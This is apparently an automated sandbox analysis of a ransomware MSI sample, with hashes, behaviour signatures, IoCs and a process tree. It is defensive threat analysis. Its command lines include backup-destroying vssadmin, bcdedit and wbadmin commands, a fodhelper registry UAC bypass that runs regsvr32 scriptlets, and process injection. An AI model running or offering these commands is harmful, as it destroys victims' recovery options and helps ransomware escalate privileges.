Analysis
max time kernel: 193s
max time network: 205s
platform: windows10-2004_x64
resource: win10v2004-en-20220113
submitted: 22-03-2022 12:17

Static task: static1
Behavioral task: behavioral1
  Sample: d1d4e29f5fca0c97cd89a4b5134d298.msi
  Resource: win7-20220310-en
Behavioral task: behavioral2
  Sample: d1d4e29f5fca0c97cd89a4b5134d298.msi
  Resource: win10v2004-en-20220113
General
Target: d1d4e29f5fca0c97cd89a4b5134d298.msi
Size: 100KB
MD5: aebfb88d2333ee74373a4cf582682070
SHA1: 3d8b0dd99846144287aeeb025a5c9fc254f66fc0
SHA256: d1d4e29f5fca0c97cd89a4b5134d298bf2829cea92e5d116084b83d980d2c6e0
SHA512: 9feb73d9c4902f03b94df49b3087418473dd0826480b5fde8ba3654dd8bf22bb372c8881e5254e5e8a0f6cf78bfb2d80c9060208c66478362bc6f75f12fca8cb
Malware Config
Signatures
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 12 IoCs)
Process: bcdedit.exe; pids: 4732, 4404, 1636, 4152, 4556, 5136, 5568, 5604, 3716, 4388, 3244, 4408
Blocklisted process makes network request (3 IoCs)
  flow | pid | Process
  8 | 3496 | msiexec.exe
  9 | 3496 | msiexec.exe
  11 | 3496 | msiexec.exe

Deletes System State backups
Process: wbadmin.exe; pids: 5336, 5360, 5440, 1844, 1924, 4656

Deletes backup catalog
Process: wbadmin.exe; pids: 5208, 5328, 5256, 5640, 5536, 3516
Modifies extensions of user files (4 IoCs)
Ransomware generally changes the extension on encrypted files.
  description | ioc | Process
  File renamed | C:\Users\Admin\Pictures\NewEdit.raw => C:\Users\Admin\Pictures\NewEdit.raw.tjtwhzx | MsiExec.exe
  File renamed | C:\Users\Admin\Pictures\UninstallRestart.raw => C:\Users\Admin\Pictures\UninstallRestart.raw.tjtwhzx | MsiExec.exe
  File opened for modification | C:\Users\Admin\Pictures\SetPop.tiff | MsiExec.exe
  File renamed | C:\Users\Admin\Pictures\SetPop.tiff => C:\Users\Admin\Pictures\SetPop.tiff.tjtwhzx | MsiExec.exe
Loads dropped DLL (1 IoC)
  pid | Process
  4028 | MsiExec.exe

Adds Run key to start application (2 TTPs, 1 IoC)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  description: File opened (read-only); Process: msiexec.exe (same for all 48 entries)
  ioc, in the order logged: \??\S:, \??\U:, \??\H:, \??\K:, \??\B:, \??\I:, \??\K:, \??\Q:, \??\R:, \??\V:, \??\F:, \??\N:, \??\F:, \??\U:, \??\S:, \??\Y:, \??\E:, \??\M:, \??\T:, \??\H:, \??\T:, \??\W:, \??\G:, \??\I:, \??\X:, \??\M:, \??\O:, \??\X:, \??\B:, \??\J:, \??\L:, \??\W:, \??\A:, \??\J:, \??\N:, \??\A:, \??\Q:, \??\R:, \??\E:, \??\P:, \??\Z:, \??\O:, \??\P:, \??\Y:, \??\Z:, \??\L:, \??\V:, \??\G:
Suspicious use of SetThreadContext (3 IoCs)
  description | pid | Process | procid_target
  PID 4028 set thread context of 2316 | 4028 | MsiExec.exe | 52
  PID 4028 set thread context of 2332 | 4028 | MsiExec.exe | 51
  PID 4028 set thread context of 2472 | 4028 | MsiExec.exe | 16

Drops file in Program Files directory (2 IoCs)
  description | ioc | Process
  File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\3a175e52-3a2b-486e-ab7e-cb310fed9ea3.tmp | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220322121845.pma | setup.exe

Drops file in Windows directory (9 IoCs)
  description | ioc | Process
  File created | C:\Windows\Installer\1cdc67a.msi | msiexec.exe
  File opened for modification | C:\Windows\Installer\1cdc67a.msi | msiexec.exe
  File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
  File created | C:\Windows\Installer\SourceHash{F9FBBF96-A25A-4F7C-A937-484F62CA84D9} | msiexec.exe
  File opened for modification | C:\Windows\Installer\ | msiexec.exe
  File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
  File opened for modification | C:\Windows\Installer\MSIC83F.tmp | msiexec.exe
  File opened for modification | C:\Windows\Installer\MSICEC8.tmp | msiexec.exe
  File created | C:\Windows\Installer\1cdc67c.msi | msiexec.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks SCSI registry key(s) (3 TTPs, 64 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe

Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Process: vssadmin.exe; pids: 3644, 364, 4880, 4892, 5444, 5736

Modifies data under HKEY_USERS (1 IoC)
  description | ioc | Process
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Modifies registry class (15 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\DelegateExecute | regsvr32.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
  Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell | regsvr32.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" | regsvr32.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" | regsvr32.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\DelegateExecute | regsvr32.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" | sihost.exe
  Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command | regsvr32.exe
  Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings | regsvr32.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\DelegateExecute | regsvr32.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | sihost.exe
  Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command | regsvr32.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" | regsvr32.exe
  Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open | regsvr32.exe
  Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command | regsvr32.exe
Suspicious behavior: EnumeratesProcesses (14 IoCs)
pid / Process: 3004 msiexec.exe (x2), 4028 MsiExec.exe (x2), 5000 msedge.exe (x2), 4436 msedge.exe (x2), 2020 identity_helper.exe (x2), 4536 msedge.exe (x4)

Suspicious behavior: MapViewOfSection (3 IoCs)
pid / Process: 4028 MsiExec.exe (x3)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (5 IoCs)
pid / Process: 4436 msedge.exe (x5)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Token entries grouped by process; repeated entries for the same token are listed once.
  pid 3496 msiexec.exe: SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
  pid 3004 msiexec.exe: SeSecurityPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege (the last two logged repeatedly, alternating, for the rest of the table)
  pid 1940 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
Suspicious use of FindShellTrayWindow (5 IoCs)
pid / Process: 3496 msiexec.exe (x2), 4436 msedge.exe (x3)
Suspicious use of WriteProcessMemory (64 IoCs)
Distinct records, in order of first appearance; the report logs every call, so the table holds 64 entries in total, most of them repeats of the 4436 -> 4988 record.
  description | pid | Process | procid_target
  PID 3004 wrote to memory of 4048 | 3004 | msiexec.exe | 94
  PID 3004 wrote to memory of 4028 | 3004 | msiexec.exe | 96
  PID 2316 wrote to memory of 3376 | 2316 | sihost.exe | 99
  PID 2332 wrote to memory of 3084 | 2332 | svchost.exe | 98
  PID 2472 wrote to memory of 1240 | 2472 | taskhostw.exe | 97
  PID 4028 wrote to memory of 4248 | 4028 | MsiExec.exe | 100
  PID 4248 wrote to memory of 4436 | 4248 | cmd.exe | 103
  PID 4436 wrote to memory of 4472 | 4436 | msedge.exe | 104
  PID 4436 wrote to memory of 4988 | 4436 | msedge.exe | 107
  PID 4436 wrote to memory of 5000 | 4436 | msedge.exe | 108
  PID 4436 wrote to memory of 4176 | 4436 | msedge.exe | 110
Processes
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea2⤵
- Modifies registry class
PID:1240
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:4444
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:4760
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a554⤵PID:4268
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:4892
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:4404
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:1636
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete catalog -quiet5⤵
- Deletes backup catalog
PID:5328
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet5⤵
- Deletes System State backups
PID:5440
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:4528
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:4240
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a554⤵PID:4160
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:5444
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:5568
-
-
C:\Windows\System32\bcdedit.exe"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:4388
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet5⤵
- Deletes System State backups
PID:1924
-
-
C:\Windows\System32\wbadmin.exe"C:\Windows\System32\wbadmin.exe" delete catalog -quiet5⤵
- Deletes backup catalog
PID:3516
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious use of WriteProcessMemory
PID:2332
  C:\Windows\system32\regsvr32.exe
    Command line: regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
    - Modifies registry class
    PID:3084
  C:\Windows\system32\cmd.exe
    Command line: cmd /c "start fodhelper.exe"
    PID:4528
    C:\Windows\system32\fodhelper.exe
      Command line: fodhelper.exe
      PID:4836
      C:\Windows\system32\regsvr32.exe
        Command line: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
        PID:4288
        C:\Windows\System32\vssadmin.exe
          Command line: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
          - Interacts with shadow copies
          PID:364
        C:\Windows\System32\bcdedit.exe
          Command line: "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
          - Modifies boot configuration data using bcdedit
          PID:4556
        C:\Windows\System32\bcdedit.exe
          Command line: "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
          - Modifies boot configuration data using bcdedit
          PID:5136
        C:\Windows\System32\wbadmin.exe
          Command line: "C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
          - Deletes System State backups
          PID:5336
        C:\Windows\System32\wbadmin.exe
          Command line: "C:\Windows\System32\wbadmin.exe" delete catalog -quiet
          - Deletes backup catalog
          PID:5256
  C:\Windows\system32\cmd.exe
    Command line: cmd /c "start fodhelper.exe"
    PID:4544
    C:\Windows\system32\fodhelper.exe
      Command line: fodhelper.exe
      PID:4904
      C:\Windows\system32\regsvr32.exe
        Command line: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
        PID:5648
        C:\Windows\System32\vssadmin.exe
          Command line: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
          - Interacts with shadow copies
          PID:5736
        C:\Windows\System32\bcdedit.exe
          Command line: "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
          - Modifies boot configuration data using bcdedit
          PID:5604
        C:\Windows\System32\bcdedit.exe
          Command line: "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
          - Modifies boot configuration data using bcdedit
          PID:3716
        C:\Windows\System32\wbadmin.exe
          Command line: "C:\Windows\System32\wbadmin.exe" delete catalog -quiet
          - Deletes backup catalog
          PID:5640
        C:\Windows\System32\wbadmin.exe
          Command line: "C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
          - Deletes System State backups
          PID:1844
C:\Windows\system32\sihost.exe
  Command line: sihost.exe
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2316
  C:\Windows\system32\regsvr32.exe
    Command line: regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
    - Modifies registry class
    PID:3376
  C:\Windows\system32\cmd.exe
    Command line: cmd /c "start fodhelper.exe"
    PID:4560
    C:\Windows\system32\fodhelper.exe
      Command line: fodhelper.exe
      PID:4848
      C:\Windows\system32\regsvr32.exe
        Command line: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
        PID:4240
        C:\Windows\System32\vssadmin.exe
          Command line: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
          - Interacts with shadow copies
          PID:4880
        C:\Windows\System32\bcdedit.exe
          Command line: "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
          - Modifies boot configuration data using bcdedit
          PID:4732
        C:\Windows\System32\bcdedit.exe
          Command line: "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
          - Modifies boot configuration data using bcdedit
          PID:4152
        C:\Windows\System32\wbadmin.exe
          Command line: "C:\Windows\System32\wbadmin.exe" delete catalog -quiet
          - Deletes backup catalog
          PID:5208
        C:\Windows\System32\wbadmin.exe
          Command line: "C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
          - Deletes System State backups
          PID:5360
  C:\Windows\system32\cmd.exe
    Command line: cmd /c "start fodhelper.exe"
    PID:4536
    C:\Windows\system32\fodhelper.exe
      Command line: fodhelper.exe
      PID:4460
      C:\Windows\system32\regsvr32.exe
        Command line: "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
        PID:4444
        C:\Windows\System32\vssadmin.exe
          Command line: "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
          - Interacts with shadow copies
          PID:3644
        C:\Windows\System32\bcdedit.exe
          Command line: "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
          - Modifies boot configuration data using bcdedit
          PID:3244
        C:\Windows\System32\bcdedit.exe
          Command line: "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
          - Modifies boot configuration data using bcdedit
          PID:4408
        C:\Windows\System32\wbadmin.exe
          Command line: "C:\Windows\System32\wbadmin.exe" delete catalog -quiet
          - Deletes backup catalog
          PID:5536
        C:\Windows\System32\wbadmin.exe
          Command line: "C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
          - Deletes System State backups
          PID:4656
C:\Windows\system32\msiexec.exe
  Command line: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\d1d4e29f5fca0c97cd89a4b5134d298.msi
  - Blocklisted process makes network request
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3496
C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3004
  C:\Windows\system32\srtasks.exe
    Command line: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:3
    PID:4048
  C:\Windows\System32\MsiExec.exe
    Command line: C:\Windows\System32\MsiExec.exe -Embedding DA9A8780BF4B97A9F3A263667738C433
    - Modifies extensions of user files
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:4028
    C:\Windows\System32\cmd.exe
      Command line: cmd /c "start microsoft-edge:http://2650bac8b4tjtwhzx.lowso.info/tjtwhzx^&1^&31382858^&57^&333^&2219041
      - Suspicious use of WriteProcessMemory
      PID:4248
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://2650bac8b4tjtwhzx.lowso.info/tjtwhzx&1&31382858&57&333&2219041
        - Adds Run key to start application
        - Enumerates system info in registry
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory
        PID:4436
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffc054b46f8,0x7ffc054b4708,0x7ffc054b4718
          PID:4472
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
          PID:4988
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
          - Suspicious behavior: EnumeratesProcesses
          PID:5000
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
          PID:4176
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1
          PID:4208
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:1
          PID:4224
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5292 /prefetch:8
          PID:1636
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
          PID:5244
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
          PID:5300
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:1
          PID:6084
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6496 /prefetch:8
          PID:4660
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
          - Drops file in Program Files directory
          PID:3000
          C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x270,0x274,0x278,0x24c,0x27c,0x7ff79fda5460,0x7ff79fda5470,0x7ff79fda5480
            PID:4120
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6496 /prefetch:8
          - Suspicious behavior: EnumeratesProcesses
          PID:2020
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4388 /prefetch:8
          PID:4392
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4120 /prefetch:8
          PID:5656
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5992 /prefetch:8
          PID:5160
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5272 /prefetch:2
          - Suspicious behavior: EnumeratesProcesses
          PID:4536
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
